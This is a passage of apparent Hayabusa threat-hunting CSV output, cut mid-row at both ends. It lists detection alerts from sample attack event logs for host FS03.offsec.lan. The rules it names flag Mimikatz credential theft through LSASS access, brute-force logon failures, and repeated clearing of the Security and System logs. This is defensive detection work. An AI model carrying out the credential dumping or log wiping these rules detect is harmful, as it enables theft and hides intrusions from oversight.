Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx -2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx -2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx -2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx -2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx -2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.340 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 